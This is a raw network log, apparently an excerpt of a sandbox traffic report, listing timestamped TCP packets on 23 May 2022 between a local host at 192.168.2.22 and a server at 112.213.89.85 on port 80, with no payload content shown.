                                                                            May 23, 2022 18:59:21.525207043 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.525348902 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.525721073 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.748178005 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.760535955 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.760565042 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.760586023 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.760607004 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.760629892 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.760653973 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.760675907 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.760699034 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.760704041 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.760725021 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.760751009 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.760775089 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.760782003 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.760787010 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.760792017 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.760796070 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.760799885 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.760803938 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.760807991 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.764231920 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.980911970 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.980953932 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.980978966 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.981004000 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.981002092 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981029034 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.981031895 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981035948 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981055975 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.981059074 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981076002 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981087923 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.981101990 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981112957 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.981127024 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981139898 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.981149912 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981164932 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.981178045 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981189966 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.981201887 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981215954 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.981226921 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981240988 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.981255054 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981267929 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.981277943 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981293917 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.981303930 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981317997 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.981331110 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981343985 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.981354952 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981370926 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.981384993 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981389999 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981395960 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.981408119 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981432915 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.981669903 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:21.985049963 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:21.985112906 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.196877003 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.196909904 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.196922064 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.196943998 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.196964979 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.196971893 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.196981907 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.197010994 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.197016001 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.197102070 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.197118044 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.197127104 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.197135925 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.197138071 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.197154045 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.197154045 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.197174072 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.197190046 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.197220087 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.197257996 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.197309971 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.197326899 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.197345972 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.197360039 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.197407961 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.197649002 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.197669029 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.197685003 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.197695017 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.197717905 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.197732925 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.197756052 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.197758913 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.197777033 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.197788954 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.197875977 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.197892904 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.197907925 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.197912931 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.197926998 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.197942019 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.198555946 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.198579073 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.198596001 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.198601007 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.198615074 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.198620081 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.198635101 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.198657036 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.198712111 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.198729038 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.198750019 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.198764086 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.198785067 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.198820114 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.198836088 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.198859930 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.198879004 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.198884010 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.198893070 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.198906898 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.198916912 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.198939085 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.199033022 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.199054956 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.199067116 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.199075937 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.199081898 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.199099064 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.199119091 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.199122906 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.199134111 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.199155092 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.199194908 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.199938059 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.199964046 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.199981928 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.199997902 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.412259102 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.412291050 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.412312031 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.412334919 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.412339926 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.412378073 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.412380934 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.413021088 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.413045883 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.413067102 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.413081884 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.413100004 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.413114071 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415409088 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415433884 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415455103 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415477037 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415493011 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415497065 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415508986 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415518999 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415532112 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415535927 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415540934 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415548086 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415564060 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415570974 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415585995 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415601969 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415622950 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415625095 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415647984 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415652990 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415674925 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415682077 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415692091 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415712118 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415725946 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415739059 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415757895 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415766001 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415775061 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415792942 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415808916 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415822029 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415843010 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415863037 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415869951 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415870905 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415887117 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415898085 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415904045 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415926933 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.415939093 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.415966988 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.416192055 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417009115 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417038918 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417066097 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417076111 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417094946 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417094946 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417119980 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417124987 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417141914 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417144060 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417170048 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417171955 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417187929 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417200089 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417220116 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417227983 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417246103 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417258978 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417278051 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417305946 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417324066 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417334080 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417346001 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417350054 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417363882 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417392015 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417418957 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417440891 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417444944 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417445898 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417447090 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417449951 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417464018 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417480946 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417496920 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417507887 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417525053 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417536020 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.417543888 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417579889 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.417706966 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.418359995 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.418442965 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.418488026 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.627154112 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.627413034 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.627485991 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.627505064 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.627521992 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.627537966 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.627554893 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.627571106 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.627588034 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.627595901 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.627604961 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.627608061 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.627618074 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.627623081 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.627638102 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.627640009 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.627643108 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.627655029 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.627670050 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.627671003 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.627682924 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.627700090 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.627701998 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.627737045 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.627804995 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.627821922 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.627846003 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.627860069 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.627863884 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.627870083 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.627873898 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.628906012 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.628931046 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.628947020 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.628962994 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.628981113 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.628998041 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.629014015 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.629031897 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.629036903 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.629050016 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.629070044 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.629075050 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.629091978 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.629105091 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.629111052 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.629118919 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.629126072 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.629132032 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.629208088 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.629228115 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.629235029 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.629395008 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.629865885 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.629885912 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.629897118 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.629913092 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.629995108 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.630016088 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.630031109 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.630034924 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.630048037 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.630112886 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.630129099 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.630132914 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.630141020 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.630155087 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.630171061 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.630182028 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.630198002 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.630213022 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.630214930 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.630223036 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.630234003 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.630258083 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.630270958 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.630276918 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.630299091 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.631261110 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.631278992 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.631294012 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.631309986 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.631320000 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.631328106 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.631345987 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.631361961 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.631385088 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.631392956 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.631445885 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.631827116 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.631861925 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.631897926 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:22.631921053 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.631949902 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.631978035 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:22.631978989 CEST4917680192.168.2.22112.213.89.85
